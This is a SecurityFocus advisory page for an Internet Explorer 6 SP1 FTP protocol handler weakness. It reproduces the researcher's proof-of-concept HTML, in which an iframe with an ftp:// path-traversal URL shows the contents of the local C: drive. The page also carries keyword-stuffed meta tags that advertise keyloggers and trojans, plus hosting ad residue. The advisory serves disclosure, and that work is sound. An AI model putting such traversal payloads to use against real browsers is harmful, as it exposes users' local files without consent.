Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

Microsoft Internet Explorer FTP Protocol Handler Local File Disclosure Weakness

An exploit is not required.

The following proof of concept is available:
<html>
<head>
<META NAME="COPYRIGHT" CONTENT="JunkCode">
<META NAME="CATEGORY" CONTENT="Freeware Utilities">
<META NAME="SITEINFO" CONTENT="http://crapware.lx.ro">
<META NAME="REVISIT-AFTER"CONTENT="5"days>
<META NAME="AUTHOR"CONTENT="JunkCode">
<META NAME="DESCRIPTION"CONTENT="Contains Freeware Utilities ( PEncrypt, ELFCrypt, Stealth Keyloggers, Trojans, Servers, Password Decryptors, Port Scanner etc... ), Useful Articles, Tutorials, Source Code etc..">
<META NAME="KEYWORDS"CONTENT="Utility, Program, Freeware, Shareware, Adware, Nagware, LCC Win32, Programming, C, C++, Java, Visual C++, Visual Basic, VBScript, JavaScript, CGI, Script, Free, Key Logger, Key Capture, Key Trap, Media, Player, MP3, WAV, AU, MP3Pro, MOV, AVI, MPEG, MPG, Explorer, Norton, Commander, Playlist Editor, Editor, Security, Software, Wrapper, Encryption, Self Extracble, Virus, Virii, Polymorphic, Stealth Keylogger, Stealth, Hidden, Fast, Compact, FP, Fronpage, Frontpage, Many, Microsoft, Sone, There, Those, UNIX, UPLOAD, WindowsNT, agains, also, directories, download, enabled, even, example, extensions, files, holes, horrible, let, list, lot, many, only, others, own, password, running, security, server, sites, vulnerabilities, while, work, Anonymity, privacy, TAZ, encryption,Internet, remailer, remailers, Mixmaster, nymserver, PGP, Proxys, WWW remailing, Mail2News, remailer tools, Paranoia, freedom.net, SSH, Onion Routing, Crowds, ACLU, Enemy of the State, MI5, MI6, Echelon, Anonymous surfing tools, NSA, idenity privacy, nym, EPIC, EFF, AAAS, SAIC, Anonymizer, DHP, CSE, attrition.org, freedom, Big Brother,Privacy International, ZKS, ZKS.net, anonymous, Cypherpunk, Type I, nowhere, Steganography, S-Tools, securenym, hushmail, mixfit, free,using cgi,how to use cgi-bin,how to use cgi,what is cgi,what is cgi,how do i use cgi,using perl scripts,how to use ssi,what is ssi,server side includes,server-side,SSI,severs,serves,common gateway interface,cgibin,cig,scrips,scritps,hosted,host,webmaster,help,unix,IIS,tutorial,instructions,guide,perl,on the fly,NT servers,bestdam,bestdamn,best damn,logger,traffic monitor,page counter,log hits,statistics,web logs,hit counts,hit counter,page statistics,track visitors,visitor count,page hits,hit information,auto e-mail,visitor information,scripts,perl,perl script,cgi-perl,cgi,web hosting,isp,what is cgi-bin,nt,host provider,analyze,analysis,tool,columns,columnar,traffic,webmaster,audit,unix,linux,best dam,NT Server,Windows NT,tutorial,guide,viewer,pearl,conts,conter,vistor,freeware download,server,shareware,keith parkansky,parkansky,keith,patch maker, ICQ, Pager, HTML, encrypt, crypt, CHTML, encode, decode, xor, decrypt, script, kiddie, crackme, cracker, procdump, unpacker, tools, w32intro, softice, anti, debugger, disassembler, w32dasm, pe, encryptor, packer, unpacker, PCGUARD, cryptor, war, northadamus, usa, britain, uk, president, bush, tony, blair, prime, minister, taliban, osama, bin, laden, osama bin laden, al, qaeda, terror, terrorists, WTC, world trade centre, attacks, PEncrypt v4.0, packers, trw2000, softice, trw, unpacker, crash">
<META NAME="ROBOTS"CONTENT="INDEX,FOLLOW">
</head>
<body>
<p align="center"><b><font face="Comic Sans MS"><u>Bypassing IE6-SP1
&quot;file://&quot; protection using &quot;ftp://&quot; !!</u></font></b></p>

<p align="center"><b>Discovered by : Gregory R. Panakkal / junkcode / viper31337</b></p>
<p align="left">Tested on : Windows 2000 SP4 - [NTFS], IE 6 SP1 up-to-date as
per windowsupdate.com</p>
<p align="left">Exploit : If you are able to see the contents of C:\ in the
iframe below, then you are vulnerable..&nbsp;</p>
<p align="left">[Info : Liu Die Yu tested on WinXP SP2 &amp; Win2003, but
the exploit failed.]</p>
<p align="left">&nbsp;</p>
<iframe src="ftp://:../../../../../../../../../../../"></iframe>
</body>
</html>
<title>
<!-- to remove the dumb lx.ro ads -->
<center>

<!-- Start of StatCounter Code -->
<script type="text/javascript" language="javascript">
var sc_project=347052;
var sc_partition=1;
var sc_invisible=1;
</script>
<script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/counter.js"></script><noscript><a href="http://www.statcounter.com/" target="_blank"><img src="http://c2.statcounter.com/counter.php?sc_project=347052&amp;java=0&amp;invisible=1" alt="free website hit counter" border="0"></a> </noscript>
<!-- End of StatCounter Code -->
<table border="0" style="border:1px solid #ccc;" cellpadding="1" cellspacing="2"><tr><td style="background-color: #eee;color:#333;font:normal normal 300 1em sans-serif">Sit gazduit de <a href="http://www.lx.ro"><font color="blue">LX.Ro</font></a>. Vrei sa ai si tu situl tau? Click <a href="http://www.lx.ro/contnou.php"><font color="blue">aici</font></a>!
</td></tr></table>
</center>







 

Privacy Statement
Copyright 2008, SecurityFocus